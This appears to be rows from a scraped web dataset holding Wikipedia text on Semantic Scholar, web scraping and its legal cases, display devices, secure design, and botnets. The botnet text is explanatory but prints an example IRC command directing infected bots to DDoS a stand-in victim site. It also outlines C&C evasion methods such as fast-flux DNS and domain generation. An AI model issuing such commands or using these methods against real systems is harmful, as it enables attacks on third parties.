with the potential to revolutionize scientific reading by making it more accessible and richly contextual. 12 Semantic Reader provides in-line citation cards that allow users to see citations with TLDR summaries as they read and skimming highlights that capture key points of a paper so users can digest faster. In contrast with Google Scholar and PubMed, Semantic Scholar is designed to highlight the most important and influential elements of a paper. 13 The AI technology is designed to identify hidden connections and links between research topics. 14 Like the previously cited search engines, Semantic Scholar also exploits graph structures, which include the Microsoft Academic Knowledge Graph, Springer Nature's SciGraph, and the Semantic Scholar Corpus (originally a 45 million papers corpus in computer science, neuroscience and biomedicine). 15 16 Each paper hosted by Semantic Scholar is assigned a unique identifier called the Semantic Scholar Corpus ID (abbreviated S2CID). The following entry is an example: Liu, Ying; Gayle, Albert A; Wilder-Smith, Annelies; Rockl v, Joacim (March 2020). "The reproductive number of COVID 19 is higher compared to SARS coronavirus". Journal of Travel Medicine. 27 (2). doi:10.1093 jtm taaa021. PMID 32052846. S2CID 211099356. Semantic Scholar is free to use and unlike similar search engines (i.e. Google Scholar) does not search for material that is behind a paywall. 5 citation needed One study compared the index scope of Semantic Scholar to Google Scholar, and found that for the papers cited by secondary studies in computer science, the two indices had comparable coverage, each only missing a handful of the papers. 17 As of January 2018, following a 2017 project that added biomedical papers and topic summaries, the Semantic Scholar corpus included more than 40 million papers from computer science and biomedicine. 18 In March 2018, Doug Raymond, who developed machine learning initiatives for the Amazon Alexa platform, was hired to lead the Semantic Scholar project. 19 As of August 2019 update , the number of included papers metadata (not the actual PDFs) had grown to more than 173 million 20 after the addition of the Microsoft Academic Graph records. 21 In 2020, a partnership between Semantic Scholar and the University of Chicago Press Journals made all articles published under the University of Chicago Press available in the Semantic Scholar corpus. 22 At the end of 2020, Semantic Scholar had indexed 190 million papers. 23 In 2020, Semantic Scholar reached seven million users per month. 7 |
646 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Techniques | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
647 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Display_device | A display device is an output device for presentation of information in visual 1 or tactile form (the latter used for example in tactile electronic displays for blind people). 2 When the input information that is supplied has an electrical signal the display is called an electronic display. Common applications for electronic visual displays are television sets or computer monitors. These are the technologies used to create the various displays in use today. Some displays can show only digits or alphanumeric characters. They are called segment displays, because they are composed of several segments that switch on and off to give appearance of desired glyph. The segments are usually single LEDs or liquid crystals. They are mostly used in digital watches and pocket calculators. Common types are seven-segment displays which are used for numerals only, and alphanumeric fourteen-segment displays and sixteen-segment displays which can display numerals and Roman alphabet letters. Cathode-ray tubes were also formerly widely used. 2 dimensional displays that cover a full area (usually a rectangle) are also called video displays, since it is the main modality of presenting video. Full-area 2 dimensional displays are used in, for example: Underlying technologies for full-area 2 dimensional displays include: The multiplexed display technique is used to drive most display devices. |
648 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_by_design | Secure by design, in software engineering, means that software products and capabilities have been designed to be foundationally secure. Alternate security strategies, tactics and patterns are considered at the beginning of a software design, and the best are selected and enforced by the architecture, and they are used as guiding principles for developers. 1 It is also encouraged to use strategic design patterns that have beneficial effects on security, even though those design patterns were not originally devised with security in mind. 2 Secure by Design is increasingly becoming the mainstream development approach to ensure security and privacy of software systems. In this approach, security is considered and built into the system at every layer and starts with a robust architecture design. Security architectural design decisions are based on well-known security strategies, tactics, and patterns defined as reusable techniques for achieving specific quality concerns. Security tactics patterns provide solutions for enforcing the necessary authentication, authorization, confidentiality, data integrity, privacy, accountability, availability, safety and non-repudiation requirements, even when the system is under attack. 3 In order to ensure the security of a software system, not only is it important to design a robust intended security architecture but it is also necessary to map updated security strategies, tactics and patterns to software development in order to maintain security persistence. Malicious attacks on software should be assumed to occur, and care is taken to minimize impact. Security vulnerabilities are anticipated, along with invalid user input. 4 Closely related is the practice of using "good" software design, such as domain-driven design or cloud native, as a way to increase security by reducing risk of vulnerability-opening mistakes—even though the design principles used were not originally conceived for security purposes. Generally, designs that work well do not rely on being secret. Often, secrecy reduces the number of attackers by demotivating a subset of the threat population. The logic is that if there is an increase in complexity for the attacker, the increased attacker effort to compromise the target will discourage them. While this technique implies reduced inherent risks, a virtually infinite set of threat actors and techniques applied over time will cause most secrecy methods to fail. While not mandatory, proper security usually means that everyone is allowed to know and understand the design because it is secure. This has the advantage that many people are looking at the source code, which improves the odds that any flaws will be found sooner (see Linus's law). The disadvantage is that attackers can also obtain the code, which makes it easier for them to find vulnerabilities to exploit. It is generally believed, though, that the advantage of the open source code outweighs the disadvantage. Also, it is important that everything works with the fewest privileges possible (see the principle of least privilege). For example, a web server that runs as the administrative user ("root" or "admin") can have the privilege to remove files and users. A flaw in such a program could therefore put the entire system at risk, whereas a web server that runs inside an isolated environment, and only has the privileges for required network and filesystem functions, cannot compromise the system it runs on unless the security around it in itself is also flawed. Secure Design should be a consideration at all points in the development lifecycle (whichever development methodology is chosen). Some pre-built Secure By Design development methodologies exist (e.g. Microsoft Security Development Lifecycle). Standards and Legislation exist to aide secure design by controlling the definition of "Secure", and providing concrete steps to testing and integrating secure systems. Some examples of standards which cover or touch on Secure By Design principles: In server client architectures, the program at the other side may not be an authorised client and the client's server may not be an authorised server. Even when they are, a man-in-the-middle attack could compromise communications. Often the easiest way to break the security of a client server system is not to go head on to the security mechanisms, but instead to go around them. A man in the middle attack is a simple example of this, because you can use it to collect details to impersonate a user. Which is why it is important to consider encryption, hashing, and other security mechanisms in your design to ensure that information collected from a potential attacker won't allow access. Another key feature to client-server security design is good coding practices. For example, following a known software design structure, such as client and broker, can help in designing a well-built structure with a solid foundation. Furthermore, if the software is to be modified in the future, it is even more important that it follows a logical foundation of separation between the client and server. This is because if a programmer comes in and cannot clearly understand the dynamics of the program, they may end up adding or changing something that can add a security flaw. Even with the best design, this is always a possibility, but the better the standardization of the design, the less chance there is of this occurring. |
649 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Botnet | A botnet is a group of Internet-connected devices, each of which runs one or more bots. Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, 1 send spam, and allow the attacker to access the device and its connection. The owner can control the botnet using command and control (C C) software. 2 The word "botnet" is a portmanteau of the words "robot" and "network". The term is usually used with a negative or malicious connotation. A botnet is a logical collection of Internet-connected devices, such as computers, smartphones or Internet of things (IoT) devices whose security have been breached and control ceded to a third party. Each compromised device, known as a "bot, is created when a device is penetrated by software from a malware (malicious software) distribution. The controller of a botnet is able to direct the activities of these compromised computers through communication channels formed by standards-based network protocols, such as IRC and Hypertext Transfer Protocol (HTTP). 3 4 Botnets are increasingly rented out by cyber criminals as commodities for a variety of purposes, 5 including as booter stresser services. Botnet architecture has evolved over time in an effort to evade detection and disruption. Traditionally, bot programs are constructed as clients which communicate via existing servers. This allows the bot herder (the controller of the botnet) to perform all control from a remote location, which obfuscates the traffic. 6 Many recent botnets now rely on existing peer-to-peer networks to communicate. These P2P bot programs perform the same actions as the client server model, but they do not require a central server to communicate. The first botnets on the Internet used a client server model to accomplish their tasks. 7 Typically, these botnets operate through Internet Relay Chat networks, domains, or websites. Infected clients access a predetermined location and await incoming commands from the server. The bot herder sends commands to the server, which relays them to the clients. Clients execute the commands and report their results back to the bot herder. In the case of IRC botnets, infected clients connect to an infected IRC server and join a channel pre-designated for C C by the bot herder. The bot herder sends commands to the channel via the IRC server. Each client retrieves the commands and executes them. Clients send messages back to the IRC channel with the results of their actions. 6 In response to efforts to detect and decapitate IRC botnets, bot herders have begun deploying malware on peer-to-peer networks. These bots may use digital signatures so that only someone with access to the private key can control the botnet, 8 such as in Gameover ZeuS and the ZeroAccess botnet. Newer botnets fully operate over P2P networks. Rather than communicate with a centralized server, P2P bots perform as both a command distribution server and a client which receives commands. 9 This avoids having any single point of failure, which is an issue for centralized botnets. In order to find other infected machines, P2P bots discreetly probe random IP addresses until they identify another infected machine. The contacted bot replies with information such as its software version and list of known bots. If one of the bots' version is lower than the other, they will initiate a file transfer to update. 8 This way, each bot grows its list of infected machines and updates itself by periodically communicating to all known bots. A botnet's originator (known as a "bot herder" or "bot master") controls the botnet remotely. This is known as the command-and-control (C C). The program for the operation must communicate via a covert channel to the client on the victim's machine (zombie computer). IRC is a historically favored means of C C because of its communication protocol. A bot herder creates an IRC channel for infected clients to join. Messages sent to the channel are broadcast to all channel members. The bot herder may set the channel's topic to command the botnet. For example, the message :herder herder example.com TOPIC channel DDoS www.victim.com from the bot herder alerts all infected clients belonging to channel to begin a DDoS attack on the website www.victim.com. An example response :bot1 bot1 compromised.net PRIVMSG channel I am DDoSing www.victim.com by a bot client alerts the bot herder that it has begun the attack. 8 Some botnets implement custom versions of well-known protocols. The implementation differences can be used for detection of botnets. For example, Mega-D features a slightly modified Simple Mail Transfer Protocol (SMTP) implementation for testing spam capability. Bringing down the Mega-D's SMTP server disables the entire pool of bots that rely upon the same SMTP server. 10 In computer science, a zombie computer is a computer connected to the Internet that has been compromised by a hacker, computer virus or trojan horse and can be used to perform malicious tasks under remote direction. Botnets of zombie computers are often used to spread e-mail spam and launch denial-of-service attacks (DDoS). Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies. A coordinated DDoS attack by multiple botnet machines also resembles a zombie horde attack. 11 The process of stealing computing resources as a result of a system being joined to a "botnet" is sometimes referred to as "scrumping". 12 Global law enforcement agencies, with the DOJ and FBI, dismantled the 911 S5 botnet, responsible for $5.9 billion in theft and various cybercrimes. Chinese national YunHe Wang, charged with operating the botnet, faces up to 65 years in prison. Authorities seized $60 million in assets, including luxury items and properties. 13 Botnet command and control (C C) protocols have been implemented in a number of ways, from traditional IRC approaches to more sophisticated versions. Telnet botnets use a simple C C botnet protocol in which bots connect to the main command server to host the botnet. Bots are added to the botnet by using a scanning script, which runs on an external server and scans IP ranges for telnet and SSH server default logins. Once a login is found, the scanning server can infect it through SSH with malware, which pings the control server. IRC networks use simple, low bandwidth communication methods, making them widely used to host botnets. They tend to be relatively simple in construction and have been used with moderate success for coordinating DDoS attacks and spam campaigns while being able to continually switch channels to avoid being taken down. However, in some cases, merely blocking of certain keywords has proven effective in stopping IRC-based botnets. The RFC 1459 (IRC) standard is popular with botnets. The first known popular botnet controller script, "MaXiTE Bot" was using IRC XDCC protocol for private control commands. One problem with using IRC is that each bot client must know the IRC server, port, and channel to be of any use to the botnet. Anti-malware organizations can detect and shut down these servers and channels, effectively halting the botnet attack. If this happens, clients are still infected, but they typically lie dormant since they have no way of receiving instructions. 8 To mitigate this problem, a botnet can consist of several servers or channels. If one of the servers or channels becomes disabled, the botnet simply switches to another. It is still possible to detect and disrupt additional botnet servers or channels by sniffing IRC traffic. A botnet adversary can even potentially gain knowledge of the control scheme and imitate the bot herder by issuing commands correctly. 14 Since most botnets using IRC networks and domains can be taken down with time, hackers have moved to P2P botnets with C C to make the botnet more resilient and resistant to termination. Some have also used encryption as a way to secure or lock down the botnet from others, most of the time when they use encryption it is public-key cryptography and has presented challenges in both implementing it and breaking it. Many large botnets tend to use domains rather than IRC in their construction (see Rustock botnet and Srizbi botnet). They are usually hosted with bulletproof hosting services. This is one of the earliest types of C C. A zombie computer accesses a specially-designed webpage or domain(s) which serves the list of controlling commands. The advantages of using web pages or domains as C C is that a large botnet can be effectively controlled and maintained with very simple code that can be readily updated. Disadvantages of using this method are that it uses a considerable amount of bandwidth at large scale, and domains can be quickly seized by government agencies with little effort. If the domains controlling the botnets are not seized, they are also easy targets to compromise with denial-of-service attacks. Fast-flux DNS can be used to make it difficult to track down the control servers, which may change from day to day. Control servers may also hop from DNS domain to DNS domain, with domain generation algorithms being used to create new DNS names for controller servers. Some botnets use free DNS hosting services such as DynDns.org, No-IP.com, and Afraid.org to point a subdomain towards an IRC server that harbors the bots. While these free DNS services do not themselves host attacks, they provide reference points (often hard-coded into the botnet executable). Removing such services can cripple an entire botnet. Calling back to popular sites 15 such as GitHub, 16 Twitter, 17 18 Reddit, 19 Instagram, 20 the XMPP open source instant message protocol 21 and Tor hidden services 22 are popular ways of avoiding egress filtering to communicate with a C C server. 23 This example illustrates how a botnet is created and used for malicious gain. Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community. 24 Computers can be co-opted into a botnet when they execute malicious software. This can be accomplished by luring users into making a drive-by download, exploiting web browser vulnerabilities, or by tricking the user into running a Trojan horse program, which may come from an email attachment. This malware will typically install modules that allow the computer to be commanded and controlled by the botnet's operator. After the software is downloaded, it will call home (send a reconnection packet) to the host computer. When the re-connection is made, depending on how it is written, a Trojan may then delete itself or may remain present to update and maintain the modules. In some cases, a botnet may be temporarily created by volunteer hacktivists, such as with implementations of the Low Orbit Ion Cannon as used by 4chan members during Project Chanology in 2010. 25 China's Great Cannon of China allows the modification of legitimate web browsing traffic at internet backbones into China to create a large ephemeral botnet to attack large targets such as GitHub in 2015. 26 The botnet controller community constantly competes over who has the most bots, the highest overall bandwidth, and the most "high-quality" infected machines, like university, corporate, and even government machines. 34 While botnets are often named after the malware that created them, multiple botnets typically use the same malware but are operated by different entities. 35 Botnets can be used for many electronic scams. These botnets can be used to distribute malware such as viruses to take control of a regular users computer software 36 By taking control of someone's personal computer they have unlimited access to their personal information, including passwords and login information to accounts. This is called phishing. Phishing is the acquiring of login information to the "victim's" accounts with a link the "victim" clicks on that is sent through an email or text. 37 A survey by Verizon found that around two-thirds of electronic "espionage" cases come from phishing. 38 The geographic dispersal of botnets means that each recruit must be individually identified corralled repaired and limits the benefits of filtering. Computer security experts have succeeded in destroying or subverting malware command and control networks, by, among other means, seizing servers or getting them cut off from the Internet, denying access to domains that were due to be used by malware to contact its C C infrastructure, and, in some cases, breaking into the C C network itself. 39 40 41 In response to this, C C operators have resorted to using techniques such as overlaying their C C networks on other existing benign infrastructure such as IRC or Tor, using peer-to-peer networking systems that are not dependent on any fixed servers, and using public key encryption to defeat attempts to break into or spoof the network. 42 Norton AntiBot was aimed at consumers, but most target enterprises and or ISPs. Host-based techniques use heuristics to identify bot behavior that has bypassed conventional anti-virus software. Network-based approaches tend to use the techniques described above; shutting down C C servers, null-routing DNS entries, or completely shutting down IRC servers. BotHunter is software, developed with support from the U.S. Army Research Office, that detects botnet activity within a network by analyzing network traffic and comparing it to patterns characteristic of malicious processes. Researchers at Sandia National Laboratories are analyzing botnets' behavior by simultaneously running one million Linux kernels—a similar scale to a botnet—as virtual machines on a 4,480 node high-performance computer cluster to emulate a very large network, allowing them to watch how botnets work and experiment with ways to stop them. 43 Detecting automated bot attacks is becoming more difficult each day as newer and more sophisticated generations of bots are getting launched by attackers. For example, an automated attack can deploy a large bot army and apply brute-force methods with highly accurate username and password lists to hack into accounts. The idea is to overwhelm sites with tens of thousands of requests from different IPs all over the world, but with each bot only submitting a single request every 10 minutes or so, which can result in more than 5 million attempts per day. 44 In these cases, many tools try to leverage volumetric detection, but automated bot attacks now have ways of circumventing triggers of volumetric detection. One of the techniques for detecting these bot attacks is what's known as "signature-based systems" in which the software will attempt to detect patterns in the request packet. However, attacks are constantly evolving, so this may not be a viable option when patterns cannot be discerned from thousands of requests. There is also the behavioral approach to thwarting bots, which ultimately tries to distinguish bots from humans. By identifying non-human behavior and recognizing known bot behavior, this process can be applied at the user, browser, and network levels. The most capable method of using software to combat against a virus has been to utilize honeypot software in order to convince the malware that a system is vulnerable. The malicious files are then analyzed using forensic software. On 15 July 2014, the Subcommittee on Crime and Terrorism of the Committee 45 on the Judiciary, United States Senate, held a hearing on the threats posed by botnets and the public and private efforts to disrupt and dismantle them. 46 The rise in vulnerable IoT devices has led to an increase in IoT-based botnet attacks. To address this, a novel network-based anomaly detection method for IoT called N-BaIoT was introduced. It captures network behavior snapshots and employs deep autoencoders to identify abnormal traffic from compromised IoT devices. The method was tested by infecting nine IoT devices with Mirai and BASHLITE botnets, showing its ability to accurately and promptly detect attacks originating from compromised IoT devices within a botnet. 47 Additionally, comparing different ways of detecting botnets is really useful for researchers. It helps them see how well each method works compared to others. This kind of comparison is good because it lets researchers evaluate the methods fairly and find ways to make them better. 48 The first botnet was first acknowledged and exposed by EarthLink during a lawsuit with notorious spammer Khan C. Smith 49 in 2001. The botnet was constructed for the purpose of bulk spam, and accounted for nearly 25% of all spam at the time. 50 Around 2006, to thwart detection, some botnets were scaling back in size. 51 |
650 | https://en.wikipedia.org/wiki/Data_scraping | https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&utm_medium=sidebar&utm_campaign=C13_en.wikipedia.org&uselang=en | Thank you for considering a donation to the Wikimedia Foundation. We invite you to reflect on the number of times you visited Wikipedia in the last year. If the knowledge you gained here was valuable, please join the 2% of readers who donate. Any amount helps: 200, 500, 750 pesos, or whatever feels right to you today. In the age of AI, access to verifiable facts is crucial. Wikipedia is at the heart of online information, powering everything from your personal searches to emerging AI technologies. Your gift strengthens the knowledge of today and tomorrow. If Wikipedia has given you useful knowledge this year, please give back. There are no small contributions: every edit counts, every donation counts. Thank you. Technology: Servers, bandwidth, maintenance, development. Wikipedia is one of the top 10 websites in the world, and it runs on a fraction of what other top websites spend. People and Projects: The other top websites have thousands of employees. Wikimedia Foundation has about 700 staff and contractors to support a wide variety of projects, making your donation a great investment in a highly-efficient not-for-profit organization. Tax deductibility information We do not sell or trade your information to anyone. By donating, you agree to share your personal information with the Wikimedia Foundation, the nonprofit organization that hosts Wikipedia and other Wikimedia projects, and its service providers pursuant to our donor policy. Wikimedia Foundation and its service providers are located in the United States and in other countries whose privacy laws may not be equivalent to your own. For more information please read our donor policy. For recurring donors, fixed monthly payments will be debited by the Wikimedia Foundation on the monthly anniversary of the first donation, until such time as you notify us to discontinue them. Donations initiated on the 29, 30, or 31 of the month will recur on the last day of the month for shorter months, as close to the original date as possible. For questions, please contact donate wikimedia.org. |
